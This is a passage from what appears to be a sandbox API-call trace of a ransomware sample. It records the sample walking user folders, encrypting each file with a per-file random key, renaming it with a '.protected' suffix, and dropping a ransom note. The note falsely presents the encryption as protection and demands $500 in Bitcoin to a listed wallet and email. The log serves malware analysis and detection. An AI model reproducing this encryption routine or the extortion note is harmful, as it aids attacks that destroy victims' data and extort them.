(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.004] CloseHandle (hObject=0x164) returned 1 [0079.004] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned 141 [0079.004] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.004] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*") returned 143 [0079.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.004] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\.") returned 143 [0079.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\..") returned 144 [0079.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.005] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.005] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.005] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.006] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0079.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0079.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.007] CloseHandle (hObject=0x168) returned 1 [0079.007] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected") returned 165 [0079.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.007] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0079.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.007] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.007] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.008] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.008] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.008] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.008] CloseHandle (hObject=0x164) returned 1 [0079.008] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.008] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.008] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned 141 [0079.008] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.008] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*") returned 143 [0079.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\.") returned 143 [0079.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\..") returned 144 [0079.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.009] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.009] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.010] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.010] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.010] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.010] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.011] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.011] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.011] CloseHandle (hObject=0x168) returned 1 [0079.011] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected") returned 165 [0079.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.011] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.011] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.011] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0079.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.012] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.012] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.013] lstrlenA 